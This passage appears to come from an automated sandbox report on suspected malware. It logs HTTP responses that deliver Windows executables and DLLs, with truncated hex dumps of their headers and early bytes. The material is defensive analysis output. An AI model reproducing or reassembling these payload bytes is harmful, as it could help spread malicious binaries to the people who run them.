                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:11 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:14 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:24 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:49:30 GMTContent-Type: application/octet-streamContent-Length: 2660864Last-Modified: Tue, 10 Dec 2024 07:14:44 GMTConnection: keep-aliveETag: "6757ea64-289a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 64 6d 29 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 18 25 00 28 00 00 00 00 40 25 00 25 fb 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 28 00 1c 7f 00 00 80 0d 25 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 25 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 af 24 00 00 10 00 00 00 b0 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 5e 00 00 00 c0 24 00 00 60 00 00 00 b4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 14 00 00 00 20 25 00 00 0a 00 00 00 14 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 25 fb 02 00 00 40 25 00 00 fc 02 00 00 1e 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 7f 00 00 00 40 28 00 00 80 00 00 00 1a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:46 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 15:49:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 